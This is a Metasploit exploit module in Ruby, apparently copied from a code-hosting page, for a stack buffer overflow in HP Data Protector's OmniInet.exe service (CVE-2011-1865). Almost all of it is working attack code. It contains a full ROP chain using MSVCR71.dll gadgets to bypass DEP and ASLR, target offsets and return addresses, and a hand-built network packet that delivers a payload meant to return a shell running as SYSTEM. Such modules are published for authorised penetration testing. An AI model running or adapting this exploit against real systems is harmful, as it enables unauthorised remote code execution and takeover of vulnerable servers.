161 lines
5.5 KiB
Ruby
161 lines
5.5 KiB
Ruby
##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = GoodRanking
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include Msf::Exploit::Remote::Tcp
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def initialize(info={})
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super(update_info(info,
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'Name' => "HP OmniInet.exe Opcode 20 Buffer Overflow",
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'Description' => %q{
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This module exploits a vulnerability found in HP Data Protector's OmniInet
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process. By supplying a long string of data as the file path with opcode '20',
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a buffer overflow can occur when this data is being written on the stack where
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no proper bounds checking is done beforehand, which results arbitrary code
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execution under the context of SYSTEM. This module is also made against systems
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such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR
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enabled by default.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'Oren Isacson', #Initial discovery, poc
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'muts', #Initial poc of the ROP exploit w/ dookie (WPM())
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'dookie', #Initial poc of the ROP exploit w/ muts (WPM())
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'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)
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'corelanc0d3r <peter.ve[at]corelan.be>', #MSF module with sinn3r, VP() ROP Chain
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],
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'References' =>
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[
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[ 'CVE', '2011-1865' ],
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[ 'OSVDB', '73571'],
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[ 'EDB', '17468' ],
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[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],
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[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],
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],
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'Payload' =>
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{
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'BadChars' => "\x00",
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'PrependEncoder' => "\x66\x81\xc4\xb8\x0b\x61\x9d", #add sp, 0xb88; popad; popfd
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},
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'DefaultOptions' =>
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{
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'EXITFUNC' => "process",
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},
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'Platform' => 'win',
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'Targets' =>
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[
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#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap
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[
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'HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008',
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{
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'Offset' => 1993, #For overwriting a RETN (6481 for SEH)
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'Ret' => 0x7C342629, #RETN - MSVCR71.dll
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'Max' => 5000,
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}
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],
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],
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'Privileged' => false,
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'DisclosureDate' => "Jun 29 2011",
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'DefaultTarget' => 0))
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register_options([Opt::RPORT(5555)], self.class)
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end
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def nop
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return make_nops(4).unpack("L")[0].to_i
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end
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def exploit
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connect
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#mona.py tekniq
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#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
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rop = [
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#Initial setup - ROP Flight Landing Strip
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0x7C342629, # SLIDE
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0x7C342629, # SLIDE
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0x7C342629, # SLIDE
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0x7C342629, # SLIDE
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#ROP begins here
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0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
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0x7c37a140, # Make EAX readable
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0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
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nop, # EBP
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0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
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0x7c37a140, # <- VirtualProtect() found in IAT
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0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
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0x7c346c0b, # Slide, so next gadget would write to correct stack location
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0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
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nop, # EDI (filler)
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nop, # will be patched at runtime (VP), then picked up into ESI
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nop, # EBX (filler)
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0x7c376402, # POP EBP # RETN (msvcr71.dll)
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0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
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0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
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0xfffff82f, # size 20001 bytes
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0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
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0x7c354901, # POP EBX # RETN (MSVCR71.dll)
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0xffffffff, # pop value into ebx
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0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
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0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
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0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
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0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
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0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
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0x7c34b8d8, # ROP NOP (-> edi)
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0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
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0xffffffc0, # value to negate, target value : 0x00000040, target: edx
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0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
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0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
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0x90909090, # NOPS (-> eax)
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0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
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].pack('V*')
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#Overflowing path "C:\Program Files\OmniBack\bin\"
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#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap
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sploit = ''
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sploit << rand_text_alpha(target['Offset']-sploit.length)
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sploit << [target.ret].pack('V*')
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sploit << rop
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sploit << payload.encoded
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sploit << rand_text_alpha(target['Max']-sploit.length)
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pkt = ''
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pkt << Rex::Text.to_unicode("\x00")
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pkt << "\x41\x41" #Length field place holder
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pkt << "\xff\xfe"
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pkt << Rex::Text.to_unicode("\x32\x00")
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pkt << (Rex::Text.to_unicode("\x20\x61\x00") * 5)
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pkt << Rex::Text.to_unicode("\x20")
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pkt << Rex::Text.to_unicode("20") #Opcode
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pkt << "\x00"
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pkt << (Rex::Text.to_unicode("\x20\x61\x00") * 7)
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pkt << Rex::Text.to_unicode("\x20\x00")
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pkt << sploit
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pkt << Rex::Text.to_unicode("\x00")
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pkt << (Rex::Text.to_unicode("\x20\x61\x00") * 16)
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#pkt length
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pkt[2,2] = [pkt.length-5].pack('n')
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print_status("Sending packet to #{datastore['RHOST']}...")
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sock.put(pkt)
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#Data Protector lags before triggering the vuln code
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#Long delay seems necessary to ensure we get a shell back
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select(nil,nil,nil,20)
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handler
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disconnect
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end
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end
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